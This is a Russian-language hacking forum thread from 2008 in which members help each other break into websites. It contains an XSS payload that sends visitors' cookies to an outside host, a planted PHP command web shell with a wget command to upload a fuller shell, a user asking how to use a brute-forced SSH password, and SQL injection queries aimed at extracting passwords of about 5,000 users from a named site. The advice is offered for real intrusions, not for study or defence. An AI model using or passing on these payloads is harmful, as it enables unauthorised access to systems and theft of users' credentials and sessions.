09.02.2008, 11:11
|
|
Новичок
Регистрация: 15.01.2008
Сообщений: 23
С нами:
9642582
Репутация:
19
|
|
все таки без него нельзя....а что должно вывести, если есть узвимость, когда я поле проверяю на нее
|
|
|
09.02.2008, 11:16
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами:
9740547
Репутация:
93
|
|
PHP код:
<script>img = new Image(); img.src = "http://s.netsec.ru/yo.gif?"+document.cookie;</script>
|
|
|
|
09.02.2008, 19:01
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
С нами:
10157371
Репутация:
1
|
|
ребя та, есть шелл на сайте такого вида: <? system($_get[cmd]) ?> но там лиункс стоит. какой коммандой мне закачать нормальный шелл? права на записть есть
|
|
|
|
09.02.2008, 20:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
wget хттп://нормальный_шелл.пхп -o куда_сохранить
|
|
|
|
У меня есть пароль, что дальше? Help!!! |
09.02.2008, 20:23
|
|
Новичок
Регистрация: 01.02.2008
Сообщений: 1
С нами:
9617488
Репутация:
0
|
|
У меня есть пароль, что дальше? Help!!!
HELP!!!!!!!!  Я добыл брутом пароль.Через Putty почему-то его не могу ввести. Признаюсь я в хаке полнейший ламос. Как не через Putty ввести пароль? Помогите!!!
|
|
|
|
09.02.2008, 20:50
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Пароль к чему ты добыл? К ssh?
|
|
|
|
10.02.2008, 17:17
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))
|
|
|
|
10.02.2008, 17:22
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Велемир
Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))
Причём тут лимит? Лимит всего лишь ограничивает/распределяет вывод данных. Если версия базы ниже пятой (насколько я догадался мускуль), то смотри форму авторизации. Значения name, 80% что совпадут с названием колонок.
|
|
|
|
10.02.2008, 17:37
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name, 2,3,4+from+site_users.columns+/*
Доступа через селект туда нету,к information_schema.tables есть.
Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
|
|
|
|
10.02.2008, 17:43
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Велемир
http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name, 2,3,4+from+site_users.columns+/*
Доступа через селект туда нету,к information_schema.tables есть.
Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
Кто тебя учил таким запросам? Купи книгу по sql
select column_name from information_schema.columns where table_name = blablabla limit 1,1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
